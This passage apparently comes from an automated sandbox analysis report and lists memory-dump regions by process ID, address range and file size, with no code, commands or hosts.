memory/1580-198-0x0000000000E00000-0x000000000149F000-memory.dmpFilesize
6.6MB
-
memory/1620-162-0x0000000000000000-mapping.dmp
-
memory/1628-360-0x00000000030C1000-0x00000000030C5000-memory.dmpFilesize
16KB
-
memory/1628-394-0x0000000072B10000-0x0000000072B19000-memory.dmpFilesize
36KB
-
memory/1628-327-0x00000000030A1000-0x00000000030A5000-memory.dmpFilesize
16KB
-
memory/1628-320-0x0000000000000000-mapping.dmp
-
memory/1628-367-0x0000000072B10000-0x0000000072B19000-memory.dmpFilesize
36KB
-
memory/1628-368-0x0000000072B10000-0x0000000072B19000-memory.dmpFilesize
36KB
-
memory/1628-395-0x0000000072B10000-0x0000000072B19000-memory.dmpFilesize
36KB
-
memory/1720-370-0x0000000000000000-mapping.dmp
-
memory/1776-353-0x0000000000000000-mapping.dmp
-
memory/1832-173-0x0000000000000000-mapping.dmp
-
memory/1852-268-0x0000000000000000-mapping.dmp
-
memory/1916-312-0x0000000000000000-mapping.dmp
-
memory/1956-255-0x0000000000000000-mapping.dmp
-
memory/1956-274-0x000000000A2B0000-0x000000000A2C5000-memory.dmpFilesize
84KB
-
memory/1956-267-0x0000000009D50000-0x000000000A150000-memory.dmpFilesize
4.0MB
-
memory/1956-269-0x0000000009D50000-0x000000000A150000-memory.dmpFilesize
4.0MB
-
memory/1956-265-0x000000000A2A0000-0x000000000A2AF000-memory.dmpFilesize
60KB
-
memory/1956-260-0x00000000073C0000-0x00000000076A0000-memory.dmpFilesize
2.9MB
-
memory/2000-233-0x0000000010000000-0x0000000011AAD000-memory.dmpFilesize
26.7MB
-
memory/2000-222-0x0000000000000000-mapping.dmp
-
memory/2080-310-0x0000000000400000-0x000000000044C000-memory.dmpFilesize
304KB
-
memory/2080-246-0x0000000000000000-mapping.dmp
-
memory/2080-253-0x0000000000400000-0x000000000044C000-memory.dmpFilesize
304KB
-
memory/2080-248-0x0000000000400000-0x000000000044C000-memory.dmpFilesize
304KB
-
memory/2344-358-0x0000000000000000-mapping.dmp
-
memory/2544-295-0x0000000000000000-mapping.dmp
-
memory/2564-323-0x0000000000000000-mapping.dmp
-
memory/2628-297-0x0000000000000000-mapping.dmp
-
memory/2920-154-0x0000000000000000-mapping.dmp
-
memory/2960-242-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/2960-203-0x0000000000000000-mapping.dmp
-
memory/2960-316-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/2960-206-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/3260-245-0x0000000000000000-mapping.dmp
-
memory/3316-376-0x0000000000E30000-0x0000000000F14000-memory.dmpFilesize
912KB
-
memory/3316-373-0x0000000000000000-mapping.dmp
-
memory/3316-379-0x0000000005F90000-0x0000000006534000-memory.dmpFilesize
5.6MB
-
memory/3316-380-0x0000000005A80000-0x0000000005B1C000-memory.dmpFilesize
624KB
-
memory/3344-299-0x0000000000000000-mapping.dmp
-
memory/3472-313-0x0000000000000000-mapping.dmp
-
memory/3656-317-0x0000000000000000-mapping.dmp
-
memory/3656-383-0x00007FF906150000-0x00007FF906C11000-memory.dmpFilesize
10.8MB
-
memory/3656-321-0x00007FF906150000-0x00007FF906C11000-memory.dmpFilesize
10.8MB
-
memory/3656-322-0x000002DAD5250000-0x000002DAD5292000-memory.dmpFilesize
264KB
-
memory/3656-318-0x000002DAD3510000-0x000002DAD358A000-memory.dmpFilesize
488KB
-
memory/3716-387-0x0000000077820000-0x00000000779C3000-memory.dmpFilesize
1.6MB
-
memory/3716-399-0x0000000077820000-0x00000000779C3000-memory.dmpFilesize
1.6MB
-
memory/3716-389-0x00000000004C0000-0x0000000000C0E000-memory.dmpFilesize
7.3MB
-
memory/3716-400-0x00000000004C0000-0x0000000000C0E000-memory.dmpFilesize
7.3MB
-
memory/3716-168-0x0000000000000000-mapping.dmp
-
memory/3772-153-0x0000000000000000-mapping.dmp
-
memory/3924-372-0x0000000000000000-mapping.dmp
-
memory/4032-220-0x0000000000000000-mapping.dmp
-
memory/4092-254-0x0000000000000000-mapping.dmp
-
memory/4128-185-0x0000000000000000-mapping.dmp
-
memory/4128-374-0x0000000000000000-mapping.dmp
-
memory/4140-326-0x0000000000000000-mapping.dmp
-
memory/4188-164-0x0000000000000000-mapping.dmp
-
memory/4208-137-0x0000000000000000-mapping.dmp
-
memory/4264-138-0x0000000000000000-mapping.dmp
-
memory/4264-140-0x0000000000400000-0x000000000173B000-memory.dmpFilesize
19.2MB
-
memory/4264-142-0x0000000000400000-0x000000000173B000-memory.dmpFilesize
19.2MB
-
memory/4264-143-0x0000000000400000-0x000000000173B000-memory.dmpFilesize
19.2MB
-
memory/4264-141-0x0000000000400000-0x000000000173B000-memory.dmpFilesize
19.2MB
-
memory/4272-132-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/4272-130-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/4272-147-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/4292-303-0x0000000000000000-mapping.dmp
-
memory/4328-300-0x0000000000000000-mapping.dmp
-
memory/4372-174-0x0000000000000000-mapping.dmp
-
memory/4384-325-0x0000000000150000-0x0000000000CF3000-memory.dmpFilesize
11.6MB
-
memory/4384-302-0x0000000000150000-0x0000000000CF3000-memory.dmpFilesize
11.6MB
-
memory/4384-390-0x0000000000150000-0x0000000000CF3000-memory.dmpFilesize
11.6MB
-
memory/4384-304-0x0000000000150000-0x0000000000CF3000-memory.dmpFilesize
11.6MB
-
memory/4384-266-0x0000000000000000-mapping.dmp
-
memory/4400-257-0x0000000000000000-mapping.dmp
-
memory/4420-157-0x0000000000000000-mapping.dmp
-
memory/4476-314-0x0000000000000000-mapping.dmp
-
memory/4492-152-0x0000000000400000-0x000000000173B000-memory.dmpFilesize
19.2MB
-
memory/4492-151-0x0000000000400000-0x000000000173B000-memory.dmpFilesize
19.2MB
-
memory/4492-150-0x0000000000400000-0x000000000173B000-memory.dmpFilesize
19.2MB
-
memory/4492-149-0x0000000000400000-0x000000000173B000-memory.dmpFilesize
19.2MB
-
memory/4492-145-0x0000000000000000-mapping.dmp
-
memory/4556-388-0x0000000004F30000-0x0000000004F42000-memory.dmpFilesize
72KB
-
memory/4556-386-0x00000000054E0000-0x0000000005AF8000-memory.dmpFilesize
6.1MB
-
memory/4556-382-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4556-396-0x0000000004F90000-0x0000000004FCC000-memory.dmpFilesize
240KB
-
memory/4556-292-0x0000000000000000-mapping.dmp
-
memory/4556-392-0x0000000005060000-0x000000000516A000-memory.dmpFilesize
1.0MB
-
memory/4580-308-0x00000000007ED000-0x00000000007FB000-memory.dmpFilesize
56KB
-
memory/4580-144-0x0000000000000000-mapping.dmp
-
memory/4580-241-0x0000000000000000-mapping.dmp
-
memory/4580-309-0x00000000007A0000-0x00000000007AE000-memory.dmpFilesize
56KB
-
memory/4580-363-0x00000000007ED000-0x00000000007FB000-memory.dmpFilesize
56KB
-
memory/4580-311-0x0000000000400000-0x000000000064F000-memory.dmpFilesize
2.3MB
-
memory/4592-319-0x0000000000000000-mapping.dmp
-
memory/4644-237-0x0000000010000000-0x000000001001D000-memory.dmpFilesize
116KB
-
memory/4644-232-0x0000000000400000-0x0000000001A83000-memory.dmpFilesize
22.5MB
-
memory/4644-230-0x0000000000400000-0x0000000001A83000-memory.dmpFilesize
22.5MB
-
memory/4644-229-0x0000000000400000-0x0000000001A83000-memory.dmpFilesize
22.5MB
-
memory/4644-315-0x0000000000400000-0x0000000001A83000-memory.dmpFilesize
22.5MB
-
memory/4644-296-0x0000000000400000-0x0000000001A83000-memory.dmpFilesize
22.5MB
-
memory/4644-226-0x0000000000000000-mapping.dmp
-
memory/4648-208-0x0000000000000000-mapping.dmp
-
memory/4648-210-0x0000000000400000-0x00000000004CE000-memory.dmpFilesize
824KB
-
memory/4648-251-0x0000000000400000-0x00000000004CE000-memory.dmpFilesize
824KB
-
memory/4648-298-0x0000000000400000-0x00000000004CE000-memory.dmpFilesize
824KB
-
memory/4648-214-0x0000000000400000-0x00000000004CE000-memory.dmpFilesize
824KB
-
memory/4668-159-0x0000000000000000-mapping.dmp
-
memory/4688-178-0x0000000000000000-mapping.dmp
-
memory/4688-194-0x0000000000400000-0x00000000004CC000-memory.dmpFilesize
816KB
-
memory/4688-188-0x0000000000400000-0x00000000004CC000-memory.dmpFilesize
816KB
-
memory/4688-181-0x0000000000400000-0x00000000004CC000-memory.dmpFilesize
816KB
-
memory/4788-366-0x0000000000360000-0x0000000000AAE000-memory.dmpFilesize
7.3MB
-
memory/4788-384-0x0000000000360000-0x0000000000AAE000-memory.dmpFilesize
7.3MB
-
memory/4788-385-0x0000000077820000-0x00000000779C3000-memory.dmpFilesize
1.6MB
-
memory/4788-369-0x0000000077820000-0x00000000779C3000-memory.dmpFilesize
1.6MB
-
memory/4788-350-0x0000000000000000-mapping.dmp
-
memory/4788-365-0x0000000000360000-0x0000000000AAE000-memory.dmpFilesize
7.3MB
-
memory/4788-362-0x0000000000360000-0x0000000000AAE000-memory.dmpFilesize
7.3MB
-
memory/4788-361-0x0000000000360000-0x0000000000AAE000-memory.dmpFilesize
7.3MB
-
memory/4828-215-0x0000000000000000-mapping.dmp
-
memory/4860-277-0x0000000000000000-mapping.dmp
-
memory/4928-133-0x0000000000000000-mapping.dmp